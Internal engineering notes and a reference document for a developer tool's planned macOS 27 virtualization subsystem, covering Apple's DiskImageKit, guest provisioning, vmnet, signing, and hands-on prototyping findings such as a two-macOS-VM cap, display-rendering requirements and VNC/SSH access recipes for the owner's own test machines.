1.**Beta API churn**: everything here targets beta SDKs; symbol/behavior changes are likely before fall GA. Mitigation: Phase 0/1 are throwaway-tolerant; no Codeman-side commitment until the helper contract survives a beta cycle.
2.**New artifact class**: Codeman ships pure TypeScript today; a Swift binary changes build/distribution (build-on-install via `xcrun swift build` on macs with Xcode CLT? prebuilt signed binary per release?). Needs an owner decision; local dev build is fine for the whole beta period.
3.**Entitlement/signing**: `com.apple.security.virtualization` is trivial for local dev, real for distribution.
4.**Adoption gating**: users need macOS 27 + Apple Silicon for months after GA. Docker cases remain the default recommendation; VM cases ship dark (feature-detected) with zero cost to everyone else.
Testbed is a dedicated MacBook the owner sacrifices to the beta (after a full backup). This supersedes the earlier dual-boot-the-Mini idea (git history has it): a dedicated machine means no OS-switching, no downtime for the Mini's live Codeman, and no FileVault pre-boot headaches.
**Sequencing rule that makes it headless: configure ALL remote access on the CURRENT macOS first, THEN upgrade in place.** An in-place beta upgrade preserves Remote Login, Tailscale, user accounts, and auto-login, so there is no Setup Assistant and no post-install physical step. (A fresh install would boot into GUI-only Setup Assistant with no SSH, which on a headless box is a dead end.)
Confirmed hardware (2026-07-28): MacBook, M3, 16 GB RAM, 256 GB disk with ~100 GB free. Verdict: green. M3 = eligible + nested-virt capable; 16 GB = host + 2-3 concurrent Linux guests (macOS guest = one at a time); 100 GB = fits with discipline: install Xcode 27 beta with the macOS platform only (skipping iOS/watchOS/tvOS simulators saves 15-20 GB), and defer any macOS guest base (~30 GB) to an external SSD or until actually needed. Linux guests + sparse ASIF overlays are the comfortable path.
### Pre-upgrade checklist (owner, physical, once)
1. Full backup (Time Machine or clone); the machine should be considered beta-only afterwards.
2. Tailscale: install, sign into the tailnet, confirm it appears in `tailscale status` from another node.
3. System Settings -> General -> Sharing: **Remote Login ON** (SSH) and **Screen Sharing ON** (for the rare GUI-only moments: Xcode license, Apple Account dialogs).
4.**FileVault stays ON** (owner decision 2026-07-28, security over convenience). Consequences: auto-login is unavailable, but FileVault's pre-boot unlock doubles as login, so an unlocked boot still lands in a live GUI session; planned remote reboots go through `sudo fdesetup authrestart` (unlocks for exactly one restart); an UNPLANNED reboot (beta kernel panic, battery drain) parks the machine at the pre-boot screen, no SSH/Tailscale, until the password is typed physically. If the testbed goes silent, suspect this first. Keep it on AC so the battery absorbs power blips.
5. Beta enrollment (manual): sign into the Apple Account in System Settings; System Settings -> General -> Software Update -> **Beta Updates** -> select the **macOS 27 Developer Beta** (preferred: framework fixes land weeks earlier than public beta; free since 2023 after accepting the agreement once at developer.apple.com; public-beta alternative: enroll at beta.apple.com). Then run the offered upgrade: plugged in, lid open, trusted network.
6. Send over: tailnet name/IP, username, and a first-login password (key install + lockdown happens remotely right after).
### Post-upgrade setup (remote, over the tailnet)
1. Verify: `sw_vers` reports 27.x, SSH reachable.
2. Server-ize the laptop: `sudo pmset -a sleep 0 disksleep 0 disablesleep 1` (lid-closed operation without an external display), `womp 1` (wake on network), `sudo systemsetup -setrestartpowerfailure on`. Keep on AC power.
3. Install the controlling host's SSH key, then disable password auth.
4. Xcode 27 beta install (the one step needing the owner's Apple Account sign-in once, doable via Screen Sharing from anywhere); `xcode-select`, license accept, verify `swift --version` + the 27 SDK (`xcrun --show-sdk-version`).
5. Phase 0 prototype loop, all remote from here: Linux guest base image (no 27-on-27 provisioning dependency), DiskImageKit overlay, boot, vmnet NAT, ssh into the guest, run `claude --version` inside.
6. Only after that loop works: start Phase 1 in `packages/codeman-vm/`.
## 9. Open decisions (owner)
1. Linux base distro/image for the default guest (proposal: Ubuntu 24.04 arm64 cloud image, matching the docker agent image's userland).
2. Helper distribution for GA: build-on-install vs prebuilt signed binary vs "bring your own Xcode".
3. Ship dark behind `CODEMAN_VM_CASES=1` for the first release, or feature-detect only?
4. Export format parity with docker-exports (one manifest schema for both?).
<!-- Reference doc for the VM subsystem (Codeman VM cases). Compiled 2026-07-29 from: Apple DocC JSON backend, macOS 27 beta 4 SDK on the testbed, a multi-source web research sweep, and hands-on prototyping on a MacBook Air M3 running macOS 27.0 beta (26A5388g). Companion to vm-cases-plan.md (the Codeman integration plan). -->
# The VM Subsystem: Apple Virtualization Stack Reference (macOS 27 "Golden Gate")
"VM subsystem" is the working name for Codeman's native-macOS VM isolation tier and everything under it. This document is the single place for what the Apple stack actually provides, what we have verified ourselves on the beta, and what is known-broken. The Codeman-side design lives in `docs/vm-cases-plan.md`.
**Research method note:** Apple's HTML doc pages are JS-rendered and come back empty to fetchers. The working route is the DocC JSON backend: `https://developer.apple.com/tutorials/data/documentation/<path>.json` (page content) and `https://developer.apple.com/tutorials/data/index/<framework>` (full symbol tree with per-symbol `beta` flags). Everything below marked "Apple docs" was parsed from that backend directly.
| AccessoryAccess (USB passthrough) | USB claim + attach to VMs | macOS 27 | Requires paid-team provisioning profile, Dock app. Out of scope for Codeman. Section 6 |
Corrections to the WWDC-session framing we started with: vmnet's topology family is a macOS 26 story (129 symbols, zero beta-flagged in 27); provisioning does NOT currently extend beyond macOS guests despite the generic-looking `VZGuestProvisioningOptions` base class; DiskImageKit has no attach/mount API at all (it is a file-format library that hands `DiskImage` objects to Virtualization, no `/dev/diskN`, no root needed, no entitlement documented).
## 2. DiskImageKit (macOS 27, Swift-only)
Public framework, `/System/Library/Frameworks/DiskImageKit.framework`. No ObjC headers; the API surface lives in the `.swiftinterface`. Verified present in the CLT 27 beta 4 SDK, and our prototype compiled against it with plain `swiftc` on the first attempt.
Bridge into Virtualization is a new beta convenience init on the existing attachment class. Note there is no `readOnly:` parameter; read-only-ness comes from each layer's own `openMode`:
### Stacking rules (Apple docs, verbatim where quoted)
- ASIF works standalone or stacked. "You can only use RAW images as standalone images or as **base** images in stacked configurations." Upper layers are always ASIF.
- **One cache layer per stack**, any number of overlays conceptually, "shallow stacks perform better" (WWDC 224). No published max-depth guidance.
- "Layers are processed from bottom (base) to top. The **topmost layer determines the stack's size and receives all writes**." `.overlay(blockCount:)` therefore also grows the virtual disk.
- UUID chaining: appending sets the child's `parentUUID` to the parent's `layerUUID`. Raw bases have no UUID. "The layer UUID **changes if the layer is written to**", and reattaching a mismatched layer throws `IncompatibleStackingError`. This is the mechanism that makes a shared read-only base safe.
- Base sharing across multiple VMs is the stated design intent ("can be shared across multiple VMs"), with the WWDC caveat that per-VM auxiliary files (EFI variable store, macOS auxiliary storage) must be duplicated per VM, never shared.
- **There is no flatten/merge.** An overlay cannot be merged back into its base (confirmed by Howard Oakley's coverage plus an independent hands-on report). Export/move flows must ship the layer chain, or flatten inside a guest (dd to a fresh attached image).
### Known issues and adoption
- **ASIF space reclamation is broken for macOS guests on the beta** (deleted files never return space, survives reboots). Linux guests reclaim correctly on both raw and ASIF via `fstrim -av`. Single detailed field report, unrefuted. Since the VM subsystem targets macOS guests, the practical rule until this is fixed is: back macOS guest disks with RAW, and revisit ASIF stacking for macOS guests each beta (stacking still works, the disks just never shrink).
- **Zero shipping adopters anywhere.** tart has a design issue with no activity; nobody has published working DiskImageKit code. Everything must be treated as field-untested (and our own testing bears that out, Section 8).
- Framework binary grew every beta (588 → 598 across betas 1-4); expect churn until GA.
- Release notes list no DiskImageKit known issues in any beta, which given the above says more about the notes than the framework.
- **Requires macOS 27 on host AND guest.** Older guests **silently ignore** the options (no error).
- **First boot after restore only.** Cannot reconfigure an already-provisioned VM; property changes after start are no-ops.
- The base class is forward-looking scaffolding; its only subclass is Mac. A Linux/cloud-init analogue may come later; do not assume it lands in 27.0. For Linux guests, cloud-init NoCloud seed ISOs remain the provisioning path (proven working, Section 8).
- Field-verified behavior (third-party hands-on, beta 3): provisioned account gets full admin + sudo; Setup Assistant fully skipped; SSH reachable ~48 s after first boot. **Race**: the account is created late in first boot (~T+54 s), after LaunchDaemons start (~T+33 s), so anything at daemon-level must wait for the account to exist.
- Open Apple-acknowledged bug: provisioned users are invisible to `CSIdentityQueryExecute()` (FB23716201).
- IPSW acquisition gotcha for automation: `VZMacOSRestoreImage.latestSupported` tracks the latest *release* (returned 26.5.2), not the installed beta; beta IPSWs must be fetched from the seed CDN explicitly.
## 4. vmnet: a macOS 26 feature set, one macOS 27 fix
Everything interesting shipped in macOS 26: `vmnet_network_create`, `vmnet_network_configuration_create`, `..._add_port_forwarding_rule`, `..._add_dhcp_reservation`, subnet/prefix/MTU/external-interface setters, NAT44/NAT66/DHCP/DNS-proxy/RA disables, plus serialization (`vmnet_network_copy_serialization` / `_create_with_serialization`) for handing networks across processes. `VZVmnetNetworkDeviceAttachment` is macOS 26.
macOS 27's only change (beta 4 release notes, verbatim): "The vmnet port forwarding APIs now support port forwarding when communicating over loopback." That closes the old gap where the host could not reach its own forwarded ports via 127.0.0.1 (confirmed working by the original bug reporter). Directly relevant to Codeman's loopback-bound production server talking to per-case guests.
Gotchas:
- vmnet networks are **not persisted**; they die with the owning process. Persist settings yourself and recreate (or serialize across processes).
- The `com.apple.vm.networking` entitlement is still restricted ("contact your Apple representative", though DTS says most requests are approved). The plain `VZNATNetworkDeviceAttachment` needs no special entitlement and is what our prototype uses.
- Ecosystem signal: tart's maintainer is not adopting in-process vmnet (prefers their separate-process softnet), so field testing of these APIs is thin.
## 5. VZCustomVirtioDevice (macOS 27, Linux guests only)
14 new types (`VZCustomVirtioDevice(+Configuration/Delegate/Provider)`, `VZVirtioQueue(+Element)`, `VZVirtioFeatureSet`, shared-memory-region types, `VZGuestMemoryMapping`), wired via `VZVirtualMachineConfiguration.customVirtioDevices`. Mandatory for guest discovery: `deviceID`, `pciClassID`, `pciSubclassID`, `virtioQueueCount`. You must write the Linux guest driver (Virtio spec 1.3/1.4). Threading contract: the framework calls the device/delegate on a serial queue (`deviceQueue`, defaulting to the VM's queue). Zero public adopters. For the VM subsystem this is a Phase 3+ option for a low-latency host-guest channel; SSH over NAT is proven and sufficient for now.
## 6. Signing and entitlements
- **Core loop (VZ + DiskImageKit + provisioning): ad-hoc signing with only `com.apple.security.virtualization` suffices.** Verified by us on beta 4 (plain `codesign --entitlements ... -s -` on a `swiftc` binary) and independently by third parties on beta 3. DiskImageKit documents no entitlement at all.
- **Over-entitling is the actual trap.** Adding `com.apple.application-identifier`/team-identifier keys without an embedded provisioning profile hangs the process before `main` (watchdog kill); shipping `com.apple.vm.networking` unauthorized gets AMFI SIGKILL at exec (exit 137, no crash report, even for `--version`). Keep the entitlements plist to exactly the one key.
- **USB passthrough breaks the ad-hoc story**: `com.apple.developer.accessory-access.usb` is profile-restricted (any paid team, no ad-hoc), additionally requires `com.apple.security.device.usb`, and `AAUSBAccessoryManager` presents UI, so it wants a Dock app, not a headless CLI. Out of scope for Codeman.
- No Xcode required for any of the above: the CLT beta (~500 MB via `softwareupdate`) carries the full macOS 27 SDK including DiskImageKit and compiles/signs everything.
## 7. Ecosystem state (July 2026)
- **tart is now `openai/tart`** (moved from cirruslabs, mid-2026) and **relicensed to FSL-1.1-ALv2** (no longer permissive). Provisioning support shipped in 2.33.0. Old cirruslabs URLs and license assumptions are stale.
- VirtualBuddy shipped provisioning ("Skip Setup Assistant") in 2.2 betas; had to add account-detail validation and a workaround installer for the cross-version bug below.
- lima is deliberately waiting for GA before touching macOS 27 APIs.
- **Code-Hex/vz (Go bindings) is dormant** (no commits since Feb 2026, no macOS 27 APIs), so the entire Go ecosystem (podman-machine, colima) currently has no path to these APIs. Swift is the only realistic binding today, which validates the VM subsystem's Swift-helper design.
- Useful pattern if ever supporting older SDKs: resolve new classes via `NSClassFromString` at runtime (no link-time dependency), fail gracefully when absent.
- **Cross-version restore bug**: installing a macOS 27 guest from IPSW on a macOS 26 host fails at 77-78% (`VZErrorDomain 10007`); fixed in 26.6b3 + Xcode 27b4 era, with a nasty MobileDevice.pkg trap (installing it from Xcode 27 beta on a 26 host requires a full macOS reinstall to undo). Not relevant to our 27-host testbed, very relevant to anyone on a 26 host.
| `vmwatchdog.sh` + `vmaccess.sh` | Supervision: root LaunchDaemon that restarts a blind/dead runner, re-points the forward, re-applies `pmset`, re-arms keep-awake; plus a keeper for the proxy/web endpoints |
Host-side diagnostics written during this work (in the session scratchpad, not on the testbed): `vnclogin.py` (Apple DH auth + session open, distinguishes "credentials rejected" from "authorized but session refused"), `vncshot.py` (decodes the raw framebuffer to PNG and reports non-black pixel counts, plus optional synthetic wake input), `relay.py` (plain TCP relay used to bridge a tailnet peer to a LAN-only host), `sshpw.py` (pty-driven password SSH for the one-time key bootstrap into a freshly provisioned guest).
### Proven working
1.**Boot**: Debian 12 arm64 cloud images (nocloud and genericcloud variants) boot under `VZEFIBootLoader` + `VZGenericPlatformConfiguration`.
2.**Networking**: `VZNATNetworkDeviceAttachment` gives the guest a `192.168.64.x` DHCP lease from the host's bootpd (leases visible in `/var/db/dhcpd_leases`, bridge is `bridge100`).
3.**cloud-init provisioning**: NoCloud seed ISO (built with `hdiutil makehybrid -iso -joliet -default-volume-name cidata`) created a `codeman` user with SSH key + passwordless sudo on first boot; `ssh codeman@<lease-ip>` from the host works with key auth.
4.**DiskImageKit stack mechanics**: opening a raw base `.readOnly`, appending an ASIF overlay (`ASIFCreationConfiguration.layer(url:type:.overlay)`), attaching via `init(diskImage:)`, and booting it. The overlay received ~44 MB of boot-time writes while the **base file's SHA-256 stayed bit-identical**, which is the write-isolation property the whole per-case design rests on.
5.**Reattach**: reopening an existing overlay and `appending(consuming:)` onto the same base passes UUID validation.
6.**macOS guest install (added later the same day)**: `VZMacOSInstaller` restore of the 27.0 IPSW (26A5388g, fetched from the seed CDN via appledb; same build as host) into a sparse 64 GiB raw disk + auxiliary storage: INSTALL-OK on the first attempt, ~25 minutes.
7.**Headless guest provisioning WORKS**: `VZMacGuestProvisioningOptions` via `setGuestProvisioning` (username, password, `enablesRemoteLogin`, `logsInAutomatically=false`) produced, with zero GUI interaction: an account with full admin (groups include `80(admin)`, `com.apple.access_ssh`), Remote Login on from first boot, port 22 reachable ~140 s after first-boot start, hostname auto-derived from the account ("Codemans-Virtual-Machine"). SSH password auth is on by default, so the bootstrap path is: pty-driven password login once to install `authorized_keys`, key auth thereafter. Note the provisioned account's sudo is NOT passwordless (`echo <pass> | sudo -S ...`), and provisioning is first-boot-only (later boots take no options and just boot).
8.**Slot-leak bug NOT reproduced on 26A5388g**: a guest-initiated `shutdown -h now` fired `guestDidStop` cleanly and an immediate relaunch started fine (SSH-ready again in ~75 s), so FB22967193 (VM slot leaked on guest-initiated shutdown, host reboot to recover) did not manifest after one cycle. Either fixed in beta 4 or needs more cycles to trigger.
### Unstable / under investigation (beta-quality territory)
Boot reliability degraded over a ~15-VM session on one host boot, ending with reproducible silent hangs (VM process alive, 0% CPU, no DHCP, no ARP, nothing on serial):
- A genericcloud base that had been booted read-write once (cloud-init first boot) subsequently hung on every boot **with the seed ISO still attached**, while booting **without** the seed succeeded, then later runs failed in both configurations. The seed correlation is strong but was observed while host state was already suspect, so it needs a retest from a clean baseline.
- The first stack-boot "success" that later wedged turned out (via DHCP lease timestamp arithmetic) never to have reached the network at all; its overlay growth was pre-network boot writes.
- Working hypothesis, matching a class of acknowledged beta bugs (e.g. the VM-slot counter that leaks on guest-initiated shutdown, FB22967193, where only a host reboot recovers): accumulated hypervisor/vmnet state on the host degrades boots. Requires a host reboot + a disciplined retest matrix to confirm.
### Display rendering: the single most important operational finding
**A VZ macOS guest renders nothing unless a `VZVirtualMachineView` is attached AND the host session is actually drawing.** Verified byte-for-byte: the guest's own screen sharing serves an all-zero framebuffer (0 non-black bytes across 400 KB samples, with a sane pixel format: `rmax/gmax/bmax = 255`, shifts 16/8/0), in-guest `screencapture` fails with "could not create image from display", and no `IODisplayWrangler` shows up in the guest's `ioreg`. Three distinct states all produce black:
1.**Headless** (VM run with no view attached).
2.**View attached, host session locked.** The lock screen suspends drawing and the guest's virtual GPU produces no frames.
3.**View attached, but the app lost its WindowServer connection** (see the incident below): black permanently until the app is restarted.
**Consequence for the VM subsystem: rendering is a first-class requirement, not an optional extra (owner decision 2026-07-29).** The product serves GUI desktops: mandatory for macOS guests, optional-but-supported for Linux guests (which can also run headless over SSH). Any VM in GUI mode must be launched by an app that attaches a `VZVirtualMachineView`, from inside a host GUI session that is logged in and unlocked. That makes the following non-negotiable parts of the design, not workarounds:
- VMs run as **GUI apps in the console user's session** (launched via a LaunchAgent or `launchctl asuser`), never as daemons.
- The **host must auto-login and never lock or sleep**; a locked host is equivalent to a powered-off display for every VM on it.
- The **guest must auto-login, never lock, and have its first-login assistant pre-suppressed**, or the "desktop" a user connects to is a password prompt or a setup wizard.
- A VM app that loses its WindowServer connection is **permanently blind** and must be restarted; supervision has to detect that, not just check that the process is alive.
- The **2-concurrent-macOS-VM cap** becomes a real capacity limit for the product, so it must be surfaced in the UI and tested (still untested worldwide as of this writing).
### Incident 2026-07-29: `killall -HUP loginwindow` (never do this on a remote Mac)
Applying a wallpaper change on the testbed with `killall -HUP loginwindow` restarted the host's login session. Three consequences:
1.**The Mac dropped off the tailnet entirely.** Tailscale's App Store build is a GUI app living in the user session, so killing the session killed the VPN; remote access was gone until someone logged in. Recovery came from a second machine on the same LAN: it could still SSH in, and then relay ports back over the tailnet (a plain TCP relay on a tailnet-connected LAN peer is a good out-of-band path worth keeping ready).
2.**The VM app lost its WindowServer connection** (`HIToolbox: received notification of WindowServer event port death`) while surviving as a process. Every later black screen traced to this, and nothing guest-side could fix it; only restarting the app restored rendering.
3. The session's `caffeinate` died, so the host resumed auto-locking.
Rule: on a remote Mac, never run session-level commands (`killall -HUP loginwindow`, `pkill -u <user>`, logout, fast user switching). `killall WallpaperAgent` alone is session-safe. Before any such command, enumerate what depends on that session: VPN, VM processes, port forwards, keep-awake helpers.
### Keeping host and guest usable unattended
- **Host**: `caffeinate -d -i -m -u` prevents display sleep but does NOT override the lock policy. "Require password after screen saver begins or display is turned off → Never" must be set in System Settings; it needs the account password, so a passwordless-sudo shell cannot script it, and turning it off does NOT dismiss a lock that is already engaged (one more unlock is always needed). `pmset -a disablesleep 1` keeps a lid-closed laptop awake but **does not survive a reboot**, and OS updates reset it too, so a supervisor should re-apply it rather than assume it sticks.
- **Rebooting an encrypted host**: use `sudo fdesetup authrestart`. FileVault's pre-boot unlock doubles as the login, so the machine returns with a **live logged-in console session** and encryption intact, no password prompt, and supervision can then bring the VMs back by itself. Verified 2026-07-30. A plain `reboot` parks at the lock screen and blacks out every VM until a human logs in.
- **Guest**: set `autoLoginUser` plus a valid `/etc/kcpassword` (XOR-obfuscated password file, key `7D 89 52 23 D2 BC DE A3`, payload zero-padded to a multiple of 12). `sysadminctl -autologin` fails with `SACSetAutoLoginPassword error:22` on provisioned accounts, and a fresh guest has no Python, so generate the bytes on the controlling host and copy them in. Then `pmset -a displaysleep 0 sleep 0 disablesleep 1`, `defaults -currentHost write com.apple.screensaver idleTime 0`, `defaults write com.apple.screensaver askForPassword 0`, and `caffeinate` inside the guest. ⚠ `autoLoginUser` was observed being wiped by failed `sysadminctl -autologin` attempts; verify it after each boot until stable.
- **Wallpaper**: animated "aerials" wallpaper is brutal over VNC. The provider lives in `~/Library/Application Support/com.apple.wallpaper/Store/Index.plist` under several keys (`AllSpacesAndDisplays:Desktop`, `:Idle`, and `SystemDefault:*` which is what the login/lock screen uses). Switch each `Provider` to `com.apple.wallpaper.choice.solid-color` with PlistBuddy and restart `WallpaperAgent`. The login-window copy is cached and only refreshes on a later login cycle.
### Remote GUI/SSH access to a guest (recipe, verified 2026-07-29)
The guest lives on the host-private NAT bridge, so remote access is guest-service + host-forward:
1.**In the macOS guest** (over ssh), use ONE mechanism, fully activated. The reliable form is Remote Management in a single kickstart call:
⚠ **Half-configured states authenticate but refuse the session.** Loading `com.apple.screensharing` while Remote Management is deactivated (or vice versa) produces an Apple-client error that names the wrong culprit: *"Screen Sharing is not permitted on <host>. Disable and re-enable Screen Sharing or Remote Management in System Settings"*. A raw-protocol client can still authenticate AND open a framebuffer in that state, so protocol-level tests pass while every Apple client fails. The remedy is exactly what the dialog says, done over ssh: `launchctl unload -w …screensharing.plist`, `kickstart -deactivate -configure -access -off`, `pkill screensharingd`, then the single activate call above.
Notes: `launchctl enable system/com.apple.screensharing` fails with "Could not find service" on this build; `load -w` is the plain-Screen-Sharing path if you deliberately want it instead of Remote Management. Apple clients negotiate `RSA-SRP` (auth type 33) and the guest logs `Authentication: SUCCEEDED :: User Name: … :: Type: RSA-SRP` on success, which is the definitive server-side confirmation.
2. **On the host**: a gateway port-forward makes the guest's 5900 reachable from the whole tailnet without per-client tunnels: self-authorize the host's own key, then `ssh -N -g -L 0.0.0.0:5901:<guest-ip>:5900 <user>@localhost` (nohup'd).
⚠⚠ **NEVER forward on host port 5900.** If the host has Screen Sharing enabled (our testbed does, from the pre-upgrade checklist), launchd already owns 5900 socket-activated. The `ssh -L` bind then fails with "Address already in use" **while the tunnel process keeps running**, so every symptom of success is present (process alive, port answers, real RFB banner) yet **every connection reaches the HOST's login window, not the guest**. This cost us an hour: guest credentials failed against the host's screensharingd, which reads exactly like broken guest auth, and we chased the (real, but irrelevant) provisioned-account identity bug. Diagnostics that would have caught it instantly: `sudo lsof -nP -iTCP:5900 -sTCP:LISTEN` showing `launchd` rather than `ssh`, or the guest's own logs showing NO auth attempts during a failed login. Always use a distinct host port and verify with `lsof` that the forward owns it.
⚠ `-g` binds all interfaces, so the forward is also visible on the host's LAN; the VNC layer still requires the account or VNC password. ⚠ The forward pins the guest IP, which changes per boot under plain NAT; re-point it after a guest reboot (the proper fix is a vmnet DHCP reservation, macOS 26 API, once we move off plain `VZNATNetworkDeviceAttachment`).
Verified working: with the forward on 5901, both a provisioned account and a `sysadminctl`-created one authenticate successfully (RFB `SecurityResult` = 0) against the guest. The guest offers security types `[30, 33, 36, 2, 35]`, i.e. Apple DH/SRP **plus classic type 2**, so non-Apple VNC clients work with the legacy password once ARD's `-setvnclegacy` is set. (The host's screensharingd, by contrast, offered no type 2, which is itself a tell that you are talking to the wrong machine.)
3. **SSH from any tailnet device**: `ssh -J <host-user>@<host> codeman@<guest-ip>` (jump through the host), after adding the connecting machine's key to the guest's `authorized_keys`.
**Client-version incompatibility (macOS 27 servers vs older Screen Sharing clients)**: an older Mac's Screen Sharing client fails Apple's `RSA-SRP` handshake against macOS 27 servers, logging `Authentication: FAILED :: User Name: <user> :: Type: RSA-SRP` server-side, while a macOS 27 client authenticates against the same servers without issue. This was verified against BOTH a macOS 27 guest and a macOS 27 host with the operator's own account, so it is a client-side version skew, not configuration, and no server-side change fixes it. Same family as the documented "macOS 26 host cannot install a 27 guest" bug. Practical workaround: bypass Apple auth entirely with classic VNC auth (security type 2), which macOS offers only when Remote Management legacy VNC is enabled. Two ways to consume it: any third-party VNC client, or a browser via noVNC.
**Browser-based access chain (zero client install, version-proof)**, all hosted on the Mac:
--> type-2-only proxy # rewrites the server's security-type list to [2]
--> ssh -L forward # loopback hop; see the Local Network note below
--> guest:5900
```
Notes learned the hard way: (a) **never bind the forward on host port 5900** (see the launchd warning above); (b) a Python proxy cannot reach the guest subnet directly because macOS **Local Network privacy** denies headless CLI binaries, surfacing as `No route to host`, so point the proxy at a loopback `ssh -L` forward instead (Apple-signed `ssh` is unaffected); (c) noVNC needs `?resize=scale` or Scaling Mode → Local Scaling, otherwise a Retina host screen (2940x1912) is unusable in a browser window; (d) noVNC speaks security type 2 only, which is exactly why the proxy rewrite is needed.
**Debugging technique that settled all of this**: a ~80-line Python RFB client (scratchpad `vnclogin.py`) that implements Apple DH auth (security type 30) and continues through `ClientInit`/`ServerInit`. It reports the server's `SecurityResult` plus the framebuffer size and desktop name, which separates "credentials rejected" from "authorized but session refused" without any GUI client. Pair it with `log stream --predicate 'process == "screensharingd"'` inside the guest, and drive a REAL Apple client headlessly from the host with `sudo launchctl asuser <uid> sudo -u <user> osascript -e 'tell application "Screen Sharing" to open location "vnc://user:pass@host:port"'`, verifying the result via `lsof -nP -iTCP -a -p <pid>` (an ESTABLISHED socket to the target) since `screencapture` fails on a lid-closed laptop ("could not create image from display"). Tailscale was never implicated: both the raw client and Apple's client work over the tailnet address once the guest service is fully activated.
### Hard-won operational lessons (write these into any tooling)
- **Silent serial is normal, not failure.** Debian's GRUB/kernel log to the graphics console; nothing attaches a getty to hvc0 by default. The reliable boot signal is the DHCP lease (or passive `tcpdump -i bridge100`), never the serial port and never a quick ping (BSD ping's first packet often dies to ARP latency; passive capture showed "dead" guests alive).
- **DHCP lease entries carry truth**: `name=` shows the guest hostname, and the lease timestamps order events; stale entries linger, so compare timestamps before attributing a lease to a boot.
- **Never boot a base image read-write.** Every RW boot mutates it (dhclient lease cache, journal, cloud-init state) and destroys experiment reproducibility, exactly why the production design only ever boots bases under overlays. Provision INTO the base once at base-build time, or provision per-case overlays with the seed, then detach the seed.
- **A killed SSH client does not kill a remote `nohup`'d VM**, and the survivor holds the EFI variable store lock: "The EFI variable store is already in use" (`VZErrorDomain 50002`) means a zombie VM process, `pkill` it.
- **EFI variable stores are per-VM state.** Fresh stores boot reliably; reuse across different VM instances is at minimum suspect on this beta (Apple's own guidance for cloned VMs is one store per VM). Cheap policy: one store per case, created with the overlay, deleted with it.
- **Downloads from cloud.debian.org mirrors truncate silently**; always verify byte count against origin `Content-Length` and resume with `curl -C -`.
- The remote host's default shell is zsh: `=` -prefixed words (`echo ===`) explode via zsh's `=cmd` expansion; keep separators zsh-safe in automation.
### The 2-concurrent-macOS-VM cap: TESTED AND CONFIRMED on macOS 27 beta 4 (2026-07-29)
We measured it, which as far as we can tell nobody had published for macOS 27. Method: `cp -c -R` the guest bundle (APFS clonefile, instant and **zero additional disk**), regenerate the machine identifier per clone (`VZMacMachineIdentifier()` written to `machine.id`; the hardware model is reused), then launch VMs until one is refused.
Result: VM #1 (8 GB, GUI) and VM #2 (4 GB, headless) ran concurrently without complaint. VM #3 was refused **instantly** at `vm.start`:
```
VZErrorDomain Code=6 "The maximum supported number of active virtual machines has been reached."
NSLocalizedFailure = "The number of virtual machines exceeds the limit."
```
**This is a licensing/kernel quota, not a resource limit**: the refusal came with **39% of system memory free** on a 16 GB host, and adding RAM or CPU cannot raise it. It matches the pre-27 behavior (`hv_apple_isa_vm_quota`), so nothing changed in 27 despite the framework's other additions. Linux guests are unaffected and are bounded only by host resources.
Design consequences: macOS-guest capacity per host is **hard-capped at 2**, so a GUI-macOS-per-case product must schedule around it (queue, evict idle VMs, or scale across hosts) and surface it in the UI. Also relevant: the acknowledged slot-leak bug (a guest-initiated shutdown failing to release a slot, recoverable only by host reboot) is far more damaging under a cap of 2 than it sounds; we did not reproduce it on beta 4, but any scheduler should treat "slot appears used but nothing is running" as a real state.
### Not yet tested
- Cache layers (`LayerType.cache`), `.overlay(blockCount:)` disk growth, stack depth performance, VirtioFS + stack combination, `truncate`, ASIF disks for macOS guests (raw used so far; ASIF has the reclamation bug).
- One more scripting lesson from this session: inner `ssh` calls inside a piped `sh -s` script MUST use `-n`, or they consume the remainder of the script from stdin and it silently never runs.
### Session timeline (what was actually established, 2026-07-29)
Linux path: base image download (with resume, mirrors truncate) → `vzboot` compiles against the beta SDK first try → EFI boot → NAT DHCP lease → cloud-init seed provisions a user with the host's SSH key → `ssh` into the guest works → DiskImageKit stack boots with an ASIF overlay taking all writes while the base stays SHA-identical. Later Linux boots became unreliable on an un-rebooted host (silent hangs, 0% CPU, no DHCP); a clean-baseline retest is still pending.
macOS path: seed-CDN IPSW (matched to the host build) → `VZMacOSInstaller` restore, ~25 min, first try → first boot with `VZMacGuestProvisioningOptions` creates an admin account with Remote Login on, no interaction needed, SSH reachable ~140 s later → key bootstrap over a one-time password login → guest shutdown/relaunch clean (the slot-leak bug did not reproduce) → GUI access fought through a port collision, a client-version incompatibility, the rendering dependency, and a self-inflicted session kill, ending with a browser-based path plus a guest hardened to auto-login and never lock.
**Lifecycle verified (stop → start), 2026-07-30**: an in-guest `shutdown -h now` fires `guestDidStop` and the runner app exits on its own; relaunching from the same bundle boots the guest in ~2 minutes straight into an auto-logged-in desktop, and the VM slot is released cleanly (an immediate restart works, so the slot-leak bug did not bite). Two operational notes: the guest takes a **new NAT lease on every boot**, so any port-forward must be re-pointed (or use a vmnet DHCP reservation), and a host reboot resets `pmset -a disablesleep`.
⚠ **Provisioning does NOT skip the per-user first-login assistant.** `VZMacGuestProvisioningOptions` skips the initial Setup Assistant (account creation, region, Apple Account) so the machine is immediately reachable, but the first time anyone actually logs into a desktop, macOS still presents its per-user wizard (Apple Intelligence, Siri, privacy, appearance, Touch ID). The operator hit exactly this. For a GUI-first product this MUST be pre-suppressed during base-image creation by writing `com.apple.SetupAssistant` keys for every account that will log in, and into `/System/Library/User Template/English.lproj/Library/Preferences/` so accounts created later inherit it.
⚠ **A partial key list is worse than none**, because the wizard simply shows the panes you missed and the operator has to click through them again after every fresh login (we hit this twice). The set that finally silenced macOS 27 beta 4: `DidSeeCloudSetup`, `DidSeeSiriSetup`, `DidSeePrivacy`, `DidSeeAppearanceSetup`, `DidSeeTouchIDSetup`, `DidSeeAvatarSetup`, `DidSeeScreenTime`, `DidSeeApplePaySetup`, `DidSeeSafariImport`, `DidSeeAccessibility`, **`DidSeeActivationLock`, `DidSeeAppStore`, `DidSeeLockdownMode`** (the three easy to miss), plus the Express-Settings flags **`SkipExpressSettingsUpdating`** and **`SkipFirstLoginOptimization`**, and the version markers `LastSeenCloudProductVersion` / `LastSeenBuddyBuildVersion` / `PreviousSystemVersion` / `PreviousBuildVersion` matching the guest build. Verify afterwards by reading the domain back and checking that no `DidSee*` key is still `0`. Note these keys change between macOS releases, so base-image creation should re-verify per OS version rather than trust a hardcoded list.
## 9. Design implications for Codeman's VM subsystem
